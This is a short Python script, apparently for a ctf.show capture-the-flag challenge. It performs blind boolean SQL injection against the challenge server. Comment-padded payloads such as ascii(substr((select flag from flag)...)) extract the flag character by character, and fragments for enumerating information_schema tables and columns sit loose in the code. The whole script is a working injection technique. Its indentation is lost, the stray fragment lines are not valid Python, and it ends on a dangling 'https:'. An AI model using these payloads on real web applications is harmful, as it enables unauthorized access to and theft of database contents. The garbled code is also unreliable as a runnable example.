"""
Created on Fri May 21 10:51:40 2021
@author: Administrator
"""
import requests
s=requests.session()
url='http://1774ea69-f82e-4a6b-825c-3e0becd685ab.challenge.ctf.show:8080/index.php'
table=""
for i in range(1,45):
print(i)
for j in range(31,128):
group_concat(table_name)frominformation_schema.tableswheretable_schema=database())from%sfor1))=%s
group_concat(column_name)frominformation_schema.columnswheretable_name=0x666C6167)from%sfor1))=%s
payload = "ascii(substr((select/**/flag/**/from/**/flag)from/**/%s/**/for/**/1))=%s#"%(str(i), str(j))
ra = s.get(url=url + '?id=0/**/or/**/' + payload).text
if 'I asked nothing' in ra:
table += chr(j)
print(table)
break
https: